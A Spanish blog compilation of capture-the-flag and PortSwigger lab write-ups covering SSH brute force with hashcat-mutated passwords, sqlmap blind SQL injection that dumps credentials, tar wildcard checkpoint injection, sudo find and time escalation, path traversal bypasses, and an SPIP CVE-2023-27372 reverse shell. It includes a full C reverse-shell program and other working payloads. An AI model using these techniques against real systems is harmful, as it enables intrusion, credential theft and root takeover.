+----+---------------+------------------------------------+---------------+---------------+------------------+---------------------+---------------------+-------------+---------------+
1 row in set (0.00 sec)

Tenemos la clave del administrador, pero parece estar cifrada. Podriamos intentar romperla, pero como ya hicimos fuerza bruta desde antes, no creo que valga la pena.

Luego de varios intentos, se me ocurrio hacer una lista de variaciones con la pass que tenemos, esto lo podemos hacer con hascat.

hashcat --stdout pass -r /usr/share/hashcat/rules/best64.rule

R3v_m4lwh3r3_k1nG!!
!!Gn1k_3r3hwl4m_v3R
R3V_M4LWH3R3_K1NG!!
r3v_m4lwh3r3_k1nG!!
R3v_m4lwh3r3_k1nG!!0
R3v_m4lwh3r3_k1nG!!1
R3v_m4lwh3r3_k1nG!!2
R3v_m4lwh3r3_k1nG!!3
R3v_m4lwh3r3_k1nG!!4
R3v_m4lwh3r3_k1nG!!5
R3v_m4lwh3r3_k1nG!!6
R3v_m4lwh3r3_k1nG!!7
R3v_m4lwh3r3_k1nG!!8
R3v_m4lwh3r3_k1nG!!9
R3v_m4lwh3r3_k1nG!!00
R3v_m4lwh3r3_k1nG!!01
R3v_m4lwh3r3_k1nG!!02
R3v_m4lwh3r3_k1nG!!11
R3v_m4lwh3r3_k1nG!!12
R3v_m4lwh3r3_k1nG!!13
R3v_m4lwh3r3_k1nG!!21
R3v_m4lwh3r3_k1nG!!22
R3v_m4lwh3r3_k1nG!!23
R3v_m4lwh3r3_k1nG!!69
R3v_m4lwh3r3_k1nG!!77
R3v_m4lwh3r3_k1nG!!88
R3v_m4lwh3r3_k1nG!!99
R3v_m4lwh3r3_k1nG!!123
R3v_m4lwh3r3_k1nG!!e
R3v_m4lwh3r3_k1nG!!s
R3v_m4lwh3r3_k1nG!a
R3v_m4lwh3r3_k1nGs
R3v_m4lwh3r3_k1nGa
R3v_m4lwh3r3_k1nGer
R3v_m4lwh3r3_k1nGie
R3v_m4lwh3r3_k1no
R3v_m4lwh3r3_k1ny
R3v_m4lwh3r3_k1n123
R3v_m4lwh3r3_k1nman
R3v_m4lwh3r3_k1ndog
1R3v_m4lwh3r3_k1nG!!
theR3v_m4lwh3r3_k1nG!!
d3v_m4lwh3r3_k1nG!!
mav_m4lwh3r3_k1nG!!
R3v_m4lwh3r3_k1nG!!
R3v_m4lwh3r3_k1nG!!
R3v_m4lwh3r3_k1nG!!
R3_m4lwh3r3_k1nG!!
R3m4lwh3r3_k1nG!!
R3vm4lwh3r3_k1nG!!
R3v_4lwh3r3_k1nG!!
R3vm
R3v_m1
R3v_m4lwh3r3_k1nG!
R3v_m4lwh3r3_k1nG
R3v_m4lwh3r3_k1n
R3v_m4lwh3r3_k1nR3v_m4lwh3r3_k1n
Rv_m4lwh3r3_k1n
1nG!
h3r3_k1nG!!v_m4lw
R3v_m4lwh3r3_k1n!
 3v_m4lwh3r3_k1nG
G!!R3v_m4lwh3r3_k1n
nG!!
1nG!!
k1nGk1nG
n3v_
_mR_mR
Z3v_m4lwh3r3_k1nG!!
U_m4lwh3r3_k1nG!!
R3v_lw
R3vmR3vm
_mR
R3r3R3r3
Rrlw
R3v_ml
R4lwh3

Simplemente lo copiamos y pegamos en un archivo, y probamos por los usuario que disponemos.

Luego de un rato vemos lo siguiente.

medusa -M ssh -h 192.168.0.14 -u john -P passwords
Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>

ACCOUNT CHECK: [ssh] Host: 192.168.0.14 (1 of 1, 0 complete) User: john (1 of 1, 0 complete) Password: R3v_m4lwh3r3_k1nG!! (1 of 77 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.0.14 (1 of 1, 0 complete) User: john (1 of 1, 0 complete) Password: !!Gn1k_3r3hwl4m_v3R (2 of 77 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.0.14 (1 of 1, 0 complete) User: john (1 of 1, 0 complete) Password: R3V_M4LWH3R3_K1NG!! (3 of 77 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.0.14 (1 of 1, 0 complete) User: john (1 of 1, 0 complete) Password: r3v_m4lwh3r3_k1nG!! (4 of 77 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.0.14 (1 of 1, 0 complete) User: john (1 of 1, 0 complete) Password: R3v_m4lwh3r3_k1nG!!0 (5 of 77 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.0.14 User: john Password: R3v_m4lwh3r3_k1nG!!0 [SUCCESS]

La pass parece ser R3v_m4lwh3r3_k1nG!!0, voy a conectarme por ssh para ver si funciona.

ssh john@192.168.0.14  
john@192.168.0.14's password: 
Last login: Wed Oct 27 02:05:25 2021 from 10.0.2.15
john@red:~$

Al ganar acceso como john, realizo un sudo -l para ver si tengo algun permiso.

sudo -l
Matching Defaults entries for john on red:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User john may run the following commands on red:
    (ippsec) NOPASSWD: /usr/bin/time

Esto es sencillo, podemos utilizar la pagina → gtfobins y buscar por time para hacer un movimiento lateral a ippsec.

Otra cosa que tiene esta maquina es que cada tanto te saca del servidor y no puedes usar cat para leer los archivos. Tambien nos imprime algunos mensajes por consola para molestar

Por tanto utilize less y luego me toco nueva mente utilizar medusa para encontrar la pass, luego rapidamente, convertirnos en ippsec.

sudo -u ippsec /usr/bin/time /bin/sh
$ bash
ippsec@red:/home/john$

Se me da por listar los archivos que tengo permitido como grupo.

ippsec@red:~$ find / -group ippsec 2>/dev/null | grep -v "/proc"
/var/www/wordpress/.git
/home/ippsec
/home/ippsec/.bash_logout
/home/ippsec/.profile
/home/ippsec/.bashrc
/home/ippsec/user.txt

Veo un .git algo raro, su contenido es lo siguiente.

ls -la
total 32
drwxrwx--- 2 root     ippsec    4096 Jul 22 20:56 .
drwxr-xr-x 6 www-data www-data  4096 Jul 21 20:26 ..
-rwxr-xr-x 1 root     root     16712 Jul 22 20:56 rev
-rw-r--r-- 1 root     root       123 Oct 31  2021 supersecretfileuc.c

#include <stdio.h>

int main()
{

    // prints hello world
    printf("Get out of here Blue!\n");

    return 0;
}

Ese es el contenido de arriba de supersecretfileuc.c, ese comentario me suena verlo por consola.

Por tanto me da a entender que quizas se este ejecutando cada cierto tiempo.

Debido a que esta compilado, podria intentar modificar su condenido y compilarlo con el mismo nombre para que me envie una shell, para ver como que usuario lo esta ejecutando.

Simplemente podemos utilizar la pagina → Online-Revershell, para crear nuestro payload.

#include <stdio.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>
#include <netinet/in.h>
#include <arpa/inet.h>

int main(void){
    int port = 4443;
    struct sockaddr_in revsockaddr;

    int sockt = socket(AF_INET, SOCK_STREAM, 0);
    revsockaddr.sin_family = AF_INET;       
    revsockaddr.sin_port = htons(port);
    revsockaddr.sin_addr.s_addr = inet_addr("192.168.0.8");

    connect(sockt, (struct sockaddr *) &revsockaddr, 
    sizeof(revsockaddr));
    dup2(sockt, 0);
    dup2(sockt, 1);
    dup2(sockt, 2);

    char * const argv[] = {"/bin/bash", NULL};
    execvp("/bin/bash", argv);

    return 0;       
}

Luego esperamos la conexion con nc, y ejecutamos el rev nuevo. Que al parecer lo va compilando cada cierto tiempo.

nc -nlvp 443
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::4443
Ncat: Listening on 0.0.0.0:4443
Ncat: Connection from 192.168.0.14.
Ncat: Connection from 192.168.0.14:54452.
root@red:/var/www/wordpress/.git$ whoami
root
root@red:/var/www/wordpress/.git$

Conclusiones

La verdad una maquina bastante interesante, algo unico que veo esto de que cada tanto se cierre la shell entre otras cosas molestas que vas encontrando a medida que haces la maquina, pero vimos muchas tecnias y cosas interesantes.

Ya saben cualquier duda o consulta, pueden usar la seccion de comentarios o contactarme por disc #Varovish/varovish.

Skills

- Web Fuzzing
- SQLMAP / SQLI
- tar command / wildcar "*" Abusing (Extra)
- find command sudo escalation privilage

Reconocimiento

Para comenzar, vamos a crear nuestro directorios de trabajo, para empezar con la fase de reconocimiento

$ mkdir Nexus
$ cd Nexus
$ mkdir content nmap exploit

Luego vamos a realizar un escaneo de servicios sobre los puertos abiertos utilizando nmap.

$ sudo nmap --open -p- -sS --min-rate 5000 -vvv -n -Pn 192.168.0.18 -oN allPorts

# Nmap 7.93 scan initiated Thu Jun 26 15:55:17 2025 as: nmap --open -p- -sS --min-rate 5000 -vvv -n -Pn -oN Allports 192.168.0.18
Nmap scan report for 192.168.0.18
Host is up, received arp-response (0.0044s latency).
Scanned at 2025-06-26 15:55:17 -03 for 7s
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 64
80/tcp open  http    syn-ack ttl 64
MAC Address: D8:F3:BC:4D:AC:A3 (Liteon Technology)

Read data files from: /usr/bin/../share/nmap
# Nmap done at Thu Jun 26 15:55:24 2025 -- 1 IP address (1 host up) scanned in 6.43 seconds

Como se puede apreciar, parece que solo tenemos el puerto 22 y el 80. El cual, este último, parece una página web al ser http. Vamos a realizar un escaneo de tecnologías con WhatWeb, a ver qué nos reporta.

$ whatweb 192.168.0.18

http://192.168.0.18 [200 OK] Apache[2.4.62], Country[RESERVED][ZZ], HTTPServer[Debian Linux][Apache/2.4.62 (Debian)], IP[192.168.0.18]

Vemos Apache, la versión y poco más; vamos a echarle un vistazo a la página web.

Vemos una página algo extraña; vamos a realizar fuzzing para encontrar algunos directorios o archivos dentro de la página que nos puedan ser de utilidad.

ffuf -c -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://192.168.0.18/FUZZ.php -t 10        

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://192.168.0.18/FUZZ.php
 :: Wordlist         : FUZZ: /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 10
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

                        [Status: 403, Size: 277, Words: 20, Lines: 10, Duration: 7ms]
#                       [Status: 200, Size: 825, Words: 124, Lines: 48, Duration: 11ms]
login                   [Status: 200, Size: 352, Words: 61, Lines: 27, Duration: 13ms]
index2                  [Status: 200, Size: 75134, Words: 30596, Lines: 1642, Duration: 13ms]
                        [Status: 403, Size: 277, Words: 20, Lines: 10, Duration: 5ms]

Luego de filtrar por archivos ”FUZZ.php” (donde FUZZ es donde vamos iterando gracias a un diccionario), encontramos que existen login.php y index2.php. Vamos a echarles un vistazo.

El login no nos muestra nada; de hecho, si miramos el código fuente, no encontramos nada relevante. Vamos a mirar la otra página.

Y vemos otra página completamente distinta; buscando info e interactuando con todo lo que se puede, llegamos a lo siguiente.

Donde si buscamos sobre nuestra IP de la máquina víctima, nos da otra página distinta.

Donde observamos un panel de login.

Pruebo credenciales basicas pero no llego a ningun lugar.

Luego pruebo una injeccion basica de sql y veo que me deja logearme, pero no me muestra nada.

Esto me hace pensar, que podriamos extraer info de la base de datos, de hecho si ponemos una comilla simple en el usuario da este error.

Utilizando la query en el ‘ order by 4. Me doy cuenta que existen 3 columnas, debido a que en el numero 4 hay un error y en el numero 3 me pone acceso denegado.

Debido a que yo no veo el output va ser blind basado en diferencia de respuesta que nos da el servidor.

Luego de realizar algunas pruebas, decido tirar de sqlmap y me reporta lo siguiente.

$ sqlmap -u http://192.168.0.18/login.php --data "user=a*&pass=a" --level 5 --dbms=mysql --risk 3 --current-db --is-dba
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.8.9.1#dev}
|_ -| . [(]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 09:57:01 /2025-06-27/

 [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* ((custom) POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
    Payload: user=a' OR NOT 8006=8006-- lYGY&pass=a

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: user=a' AND (SELECT 4590 FROM(SELECT COUNT(*),CONCAT(0x716a717171,(SELECT (ELT(4590=4590,1))),0x717a766271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- ikkA&pass=a

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: user=a' AND (SELECT 8526 FROM (SELECT(SLEEP(5)))yjFT)-- gzvx&pass=a
---
[09:57:02] [INFO] testing MySQL
[09:57:02] [INFO] confirming MySQL
[09:57:02] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian
web application technology: Apache 2.4.62
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
[09:57:02] [INFO] fetching current database
[09:57:02] [INFO] retrieved: 'sion'
current database: 'sion'
[09:57:02] [INFO] testing if current user is DBA
[09:57:02] [INFO] fetching current user
[09:57:03] [INFO] retrieved: 'root@localhost'
current user is DBA: True

Por tanto si es vulnerable a SQLI, voy a extraer toda la info para ver que nos encontramos.

[09:57:58] [INFO] retrieved: 'users'
Database: sion
[1 table]
+-------+
| users |
+-------+

Database: sion
Table: users
[2 entries]
+----+--------------------+----------+
| id | password           | username |
+----+--------------------+----------+
| 1  | F4ckTh3F4k3H4ck3r5 | shelly   |
| 2  | cambiame08         | admin    |
+----+--------------------+----------+

Encontramos estos dos usuarios, el cual pruebo shell y para poder conectarme por ssh con esa contraseña y me deja.

$ ssh shelly@192.168.0.18
The authenticity of host '192.168.0.18 (192.168.0.18)' can't be established.
ED25519 key fingerprint is SHA256:r1lUfXxL8Fd1e/Q87Jno3P3xHjMTUwmJlKfcsl0AST8.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.0.18' (ED25519) to the list of known hosts.
**************************************************************
HackMyVM System                                              *
                                 *
   *  .  . *       *    .        .        .   *    ..        *
 .    *        .   ###     .      .        .            *    *
    *.   *        #####   .     *      *        *    .       *
  ____       *  ######### *    .  *      .        .  *   .   *
 /   /\  .     ###\#|#/###   ..    *    .      *  .  ..  *   *
/___/  ^8/      ###\|/###  *    *            .      *   *    *
|   ||%%(        # }|{  #                           *
|___|,  \\         }|{                        *
                                *
                                                             *
Wellcome to Nexus Vault.                    *
**************************************************************



shelly@192.168.0.18's password: 


######################
DONT TOUCH MY SYSTEM #
######################
Last login: Thu May  8 22:44:41 2025 from 192.168.1.10
-bash: warning: setlocale: LC_ALL: cannot change locale (en_US.UTF-8)
shelly@NexusLabCTF:~$

Escalada de Privilegios

shelly@NexusLabCTF:~$ cd SA/
shelly@NexusLabCTF:~/SA$ ls
user-flag.txt
shelly@NexusLabCTF:~/SA$ cat user-flag.txt 

   ▄█    █▄      ▄▄▄▄███▄▄▄▄    ▄█    █▄  
  ███    ███   ▄██▀▀▀███▀▀▀██▄ ███    ███ 
  ███    ███   ███   ███   ███ ███    ███ 
 ▄███▄▄▄▄███▄▄ ███   ███   ███ ███    ███ 
▀▀███▀▀▀▀███▀  ███   ███   ███ ███    ███ 
  ███    ███   ███   ███   ███ ███    ███ 
  ███    ███   ███   ███   ███ ███    ███ 
  ███    █▀     ▀█   ███   █▀   ▀██████▀  

HackMyVM
Flag User ::  82kd8FJ5SJ00HMVUS3R36gd

shelly@NexusLabCTF:~/SA$

Ahi podemos observar la flag del usuario, ahora nos toca escalar privilegios.

Luego de hacer una pequeña enumeracion, me encuentro enumerando tareas cron, utilizando el siguiente script.

#!/bin/bash

old_command=$(ps -eo user,command)
while true;do
    new_command=$(ps -eo user,command)
    diff <(echo "$old_command") <(echo "$new_command") | grep ["\>\<"] | grep -vE "kworker|procmon|command"
    old_command=$new_command
done

shelly@NexusLabCTF:/tmp$ ./procmon.sh 
/bin/bash: warning: setlocale: LC_ALL: cannot change locale (en_US.UTF-8)
> root     /usr/sbin/CRON -f
> root     /bin/sh -c /usr/local/bin/wildcard-access.sh
< root     /usr/sbin/CRON -f
< root     /bin/sh -c /usr/local/bin/wildcard-access.sh

Veo que hay una tarea cron que root ejecuta con sh “/usr/local/bin/wildcard-access.sh”.

Si vemos lo que hace, nos encontramos con lo siguiente.

shelly@NexusLabCTF:/tmp$ cat /usr/local/bin/wildcard-access.sh 
tar -cf /tmp/backup.tar /home/shelly/backup/*

Vemos que hace un “tar -cf /tmp/backup.tar /home/shelly/backup/*”, basicamente comprime todo lo que hay en /home/shelly/backup/ y el output lo pone en /tar como backup.tar.

Esto no deberia ser un problema, pero debido a como funciona el wildcard “*”, esto es muy peligroso.

Esto se puede abusar debido a que con tar hay una forma de ejecutar comandos.

Si ponemos help en tar, vemos lo siguiente en una parte del manual de ayuda.

shelly@NexusLabCTF:/tmp$ tar --help Usage: tar [OPTION...] [FILE]... GNU 'tar' saves many files together into a single tape or disk archive, and can restore individual files from the archive.

      --checkpoint[=NUMBER]  display progress messages every NUMBERth record
                             (default 10)
      --checkpoint-action=ACTION   execute ACTION on each checkpoint

Si investigamos, encontraremos que esto se puede utilizar para ejecutar comandos, debido a que no tenemos permiso para cambiar el archivo de la tarea cron.

shelly@NexusLabCTF:/tmp$ ls -la /usr/local/bin/wildcard-access.sh 
-rwxr-xr-x 1 root root 46 Apr 20 17:07 /usr/local/bin/wildcard-access.sh

Lo que podemos hacer es crearnos archivos que contengan ese comando, y debido al wildcar “*“ cuando ejecute la tarea cron, nos va tomas como comandos el nombre de los archvios.

shelly@NexusLabCTF:/tmp$ cd /home/shelly/ 
shelly@NexusLabCTF:~$ ls
SA
shelly@NexusLabCTF:~$ mkdir backup
shelly@NexusLabCTF:~$ cd backup/
shelly@NexusLabCTF:~/backup$

Creo el directorio backup porque es bajo esta ruta donde se aplica el comando y debido a que no existe la ruta, hay que crearlo.

Primero vamos a crearnos un script en sh, que asigne permisos SUID a la bash por ejemplo para una vez sea ejecutado poder convertirnos en root.

echo "chmod +4000 /bin/bash" >> exploit.sh
shelly@NexusLabCTF:~/backup$ cat exploit.sh 
chmod 4000 /bin/bash
shelly@NexusLabCTF:~/backup$ ls -la /bin/bash
-rwxr-xr-x 1 root root 1265648 Mar 29  2024 /bin/bash
shelly@NexusLabCTF:~/backup$

Ahora vamos a crear nuestro archivo para abusar del wildcard “*” en la tarea cron.

shelly@NexusLabCTF:~/backup$ echo "" > ' --checkpoint-action=exec=sh exploit.sh'
shelly@NexusLabCTF:~/backup$ echo "" > ' --checkpoint=1'
shelly@NexusLabCTF:~/backup$ ls
' --checkpoint-action=exec=sh exploit.sh'  ' --checkpoint=1'   exploit.sh
-rw-r--r-- 1 shelly shelly   21 Jun 27 15:36  exploit.sh

Como vemos, lo que hacemos es crear el archivo como si fuese un comando, cuando se ejecute la tarea cron.

Lo cual, aparte de hacer la compresión de todo lo que hay en backup/, también ejecutará nuestro exploit.sh, el cual asignará el permiso SUID a la /bin/bash.

Luego de esperar un rato, no funciona; por tanto, debe estar parcheado de alguna forma.

Luego de seguir investigando, me encuentro con lo siguiente.

shelly@NexusLabCTF:/tmp$ sudo -l
sudo: unable to resolve host NexusLabCTF: Name or service not known
Matching Defaults entries for shelly on NexusLabCTF:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, env_keep+=LD_PRELOAD,
    use_pty

User shelly may run the following commands on NexusLabCTF:
    (ALL) NOPASSWD: /usr/bin/find

Parece que podemos ejecutar con sudo el comando find, esto tambien es peligroso, debido a que por ejemplo en → gtfobins, hay formas de escalar privilegios, vamos a probarlo.

shelly@NexusLabCTF:/tmp$ sudo find . -exec /bin/sh \; -quit
sudo: unable to resolve host NexusLabCTF: Name or service not known
# whoami
root

De esta forma, logramos escalar privilegios y convertirnos en root.

Conclusiones

Maquina bastante interesante, donde se ve sobre un SQLI y como abusar del binario find, me hubiese gustado que el tar con el wildcar “*“, funcione pero lo dejare como extra por si algun dia se encuentran algo parecido para que lo tengan en cuenta, ya saben que tienen los comentarios o me pueden contactar por disc cualquier duda.

Laboratorio 5

Continuamos con los laboratorios de Path-Traversal de Portswigger en este caso el quinto laboratorio.

Resolucion

Observamos la clásica web de ventas de productos que solemos observar en los laboratorios de Portswigger.

Como leemos en la descripción del laboratorio, la vulnerabilidad de Path Traversal se encuentra en la zona donde se representa las imágenes. Por tanto, vamos a interceptarlo con Burpsuite para realizar algunas pruebas.

Como se puede observar, el lugar donde se almacena la imagen es diferente a los anteriores laboratorios. Si observamos la descripción vemos que la web válida si la ruta del archivo empieza con "/var/www/images".

Si intentamos reemplazarlo por un "../../../../../etc/passwd" o "/etc/passwd" nos resultará en un error.

Lo que vamos a realizar es un Path Traversal, pero empezando desde la url que nos proporciona la página web, es decir "/var/www/images/../../../etc/passwd".

Y con eso logramos realizar el Path Traversal, si volvemos a la web nos dan como superado el laboratorio.

Conclusiones

Con esto damos por finalizado el 5 laboratorio de Path Traversal de Portswigger, donde hay una restricción de la ubicación en la ruta del archivo. Cualquier duda o consulta pueden contactarme o usar las zonas de comentarios.

Laboratorio 4

Este es el laboratorio 4 de Portswigger, vamos a continuar los laboratorios sobre Path-Traversal.

Resolucion

Vemos la típica página web ya habitual en los laboratorios de Portswigger sobre la venta de ciertos artículos.

Vemos en la descripción del laboratorio que en la representación de las imágenes es donde se acontece el Path-Traversal. Entonces vamos a abrir alguna y vamos a interceptar con Burpsuite para realizar algunas pruebas.

Como se puede observar, nos muestra un error de archivo "No such file". Si leemos la descripción del laboratorio, nos mencionan que la aplicación nos url-encodea nuestro input antes de aplicarlo.

Esto quiere decir que nuestro input se convierte en "../../../../../etc/passwd" -> "%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64" como vemos la página a la hora de interpretarnos esto quizás encuentre algún problema.

Normalmente, podemos intentar url-encodear nuestro input dos veces. Esto suele permitirnos bypassear o burlar ciertas validaciones que se pueden estar aconteciendo.

Para esto vamos a utilizar el Decoder del propio Burpsuite.

Y ahí podemos observar como responder el "/etc/passwd" y si volvemos a la página web nos dan como finalizado el laboratorio.

Conclusiones

Con esto damos por finalizado el 4 laboratorio de Path-Traversal de Burpsuite, logramos ver otra forma de poder burlar ciertas validaciones que se pueden acontecer. Ya saben, cualquier consulta o duda pueden contactarme o escribir en la zona de comentarios.

Skills

- Wfuzzing
- RCE CVE-2023-27372
- AppArmor (Escape de restriccion)

Reconocimiento

Para comenzar vamos a crear nuestros directorios con los que vamos a ir trabajando.

$ mkdir Publisher
$ cd Publisher
$ mkdir content nmap exploit

Vamos a comenzar realizando un escaneo de los puertos de la máquina víctima para conocer los servicios que están siendo expuestos.

$ sudo nmap --open -p- -sS --min-rate 5000 -vvv -n -Pn 192.168.0.20 -oG allPorts

# Nmap 7.94SVN scan initiated Sun Aug 11 08:11:30 2024 as: nmap --open -p- -sS --min-rate 5000 -vvv -n -Pn -oG allPorts
 192.168.0.20
# Ports scanned: TCP(65535;1-65535) UDP(0;) SCTP(0;) PROTOCOLS(0;)
Host: 192.168.0.20 ()   Status: Up
Host: 192.168.0.20 ()   Ports: 22/open/tcp//ssh///, 80/open/tcp//http///    Ignored State: closed (65533)
# Nmap done at Sun Aug 11 08:11:36 2024 -- 1 IP address (1 host up) scanned in 5.84 seconds

Yo lo exporto en formato grepeable porque tengo una función llamada extractPorts -> (link de la utilidad de extractPorts creada por s4vitar, instalar xclip)

$ extractPorts allPorts

[*] Extracting information...

    [*] IP Address: 192.168.0.20
    [*] Open ports: 22,80

[*] Ports copied to clipboard

Vamos a realizar un escaneo más extensivo, para saber que servicios y la versión que corren para esos puertos.

$ nmap -sCV -p22,80 192.168.0.20 -oN targeted

# Nmap 7.94SVN scan initiated Sun Aug 11 08:19:12 2024 as: nmap -sCV -p22,80 -oN targeted 192.168.0.20
Nmap scan report for 192.168.0.20
Host is up (0.0070s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 44:5f:26:67:4b:4a:91:9b:59:7a:95:59:c8:4c:2e:04 (RSA)
|   256 0a:4b:b9:b1:77:d2:48:79:fc:2f:8a:3d:64:3a:ad:94 (ECDSA)
|_  256 d3:3b:97:ea:54:bc:41:4d:03:39:f6:8f:ad:b6:a0:fb (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Publisher's Pulse: SPIP Insights & Tips
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Aug 11 08:19:19 2024 -- 1 IP address (1 host up) scanned in 7.04 seconds

Podemos observar el puerto '22' -> "ssh" y el puerto '80' que corresponde a un servicio web, vamos a lanzar un 'whatweb' por consola al servicio web para intentar ver un poco más de información útil.

$ whatweb 192.168.0.20

http://192.168.0.20 [200 OK] Apache[2.4.41], Country[RESERVED][ZZ], HTTPServer[Ubuntu Linux][Apache/2.4.41 (Ubuntu)], IP[192.168.0.20], Title[Publisher's Pulse: SPIP Insights & Tips]

No nos reporta gran cosa, vamos a mirar como se ve el servicio web.

Vemos una página, donde parece que se comparten artículos, tutoriales, opiniones, etc. Sobre SPIP, investigando nos encontramos que SPIP: Es un software libre de origen francés tipo sistema de gestión de contenidos destinado a la producción de sitios web, orientado a revistas colaborativas en línea e inspirado en los roles de una redacción.

También observamos varias secciones, pero no nos llevan a ningún lugar, también observamos un usuario 'admin' que publico algo un posible usuario para tenerlo en cuenta.

Vamos a realizar fuzzing con wfuzz para ver si encontramos algún directorio que nos pueda resultar útil.

$ wfuzz -w /usr/share/ -c --hc=404 -t 50 http://192.168.0.20/FUZZ

Target: http://192.168.0.20/FUZZ
Total requests: 220560

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                        
=====================================================================
000000004:   200        150 L    766 W      8686 Ch     "#"                                                            
000000014:   200        150 L    766 W      8686 Ch     "http://192.168.0.20/"                                         
000000016:   301        9 L      28 W       313 Ch      "images"                                                       
000008521:   301        9 L      28 W       311 Ch      "spip"                                                         
000045240:   200        150 L    766 W      8686 Ch     "http://192.168.0.20/"                                         
000095524:   403        9 L      28 W       277 Ch      "server-status"                                                
000117772:   404        9 L      31 W       274 Ch      "Class-Entity"

Vemos un 'server-status' y un 'spip', vamos a revisar ambos para qué nos devuelve la web

Por parte del 'server-status', parece que necesitamos credenciales porque nos sale un 'forbiden' pero el 'spip' ya nos muestra una algo diferente.

Investigando, me encuentro que estamos en contra de la versión Spip 4.2.0, la cual parece tener un Remote Code Execution (RCE) en el panel login cuando le damos a recuperar contraseña.

Utilizamos cualquier correo, eso no es relevante. Vamos a interceptar esta petición con Burpsuite para hacer algunas pruebas.

Lo enviamos al repetear para ver las respuestas del lado del servidor.

El problema viene con ese campo 'oubli', el cual no está muy bien sanitizado, podemos ejecutar comandos de forma remota.

Como pueden observar el payload es una revershell en php, si quieren más información de porque se acontece este RCE. Les recomiendo buscar el CVE de esta vulnerabilidad CVE-2023-27372.

Por otro lado, antes de enviar la petición, nos ponemos en escucha con "nc" por el puerto 443 y esperamos nuestra revershell.

$ sudo nc -nlvp 443
listening on [any] 443 ...

connect to [192.168.0.11] from (UNKNOWN) [192.168.0.20] 56842
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
www-data@41c976e507f8:/home/think/spip/spip$ whoami
www-data
www-data@41c976e507f8:/home/think/spip/spip$

Y ganamos acceso a la máquina, ahora vamos a realizar un tratamiento de la tty para poder operar de forma más cómoda.

$ script /dev/null -c bash
ctl + z
$ stty raw -echo; fg
reset xterm
$ www-data@41c976e507f8:/home/think/spip/spip$ export TERM=xterm
$ www-data@41c976e507f8:/home/think/spip/spip$ export SHELL=bash

Con esto ya podremos hacer ctrl + c, ctrl + l. Sin ningún inconveniente.

Escalada de Privilegios

Bien, en este punto estamos como www-data y vamos a tener que escalar para llegar a ser root.

Si regresamos algúnos directorios vemos la flag, en la carpeta think

$ www-data@41c976e507f8:/home/think/spip/spip$ cd ../..
$ www-data@41c976e507f8:/home/think$ ls
spip
user.txt
$ www-data@41c976e507f8:/home/think$ cat user.txt
fa229046d44eda6a3598c73ad96f4ca5  
www-data@41c976e507f8:/home/think$

Si realizamos un cat del /etc/passwd y filtramos por los que tienen una bash en el sistema, nos encontramos que think es un usuario.

$ www-data@41c976e507f8:/home/think$ cat /etc/passwd | grep "sh$" 
root:x:0:0:root:/root:/bin/bash
think:x:1000:1000::/home/think:/bin/sh
$ www-data@41c976e507f8:/home/think$

Si observamos, nosotros podemos ver el directorio personal de think. Por tanto, podríamos intentar ver su id_rsa para poder conectarnos por ssh por el puerto 22.

$ www-data@41c976e507f8:/home/think$ ls -la

total 48
drwxr-xr-x 8 think    think    4096 Feb 10  2024 .
drwxr-xr-x 1 root     root     4096 Dec  7  2023 ..
lrwxrwxrwx 1 root     root        9 Jun 21  2023 .bash_history -> /dev/null
-rw-r--r-- 1 think    think     220 Nov 14  2023 .bash_logout
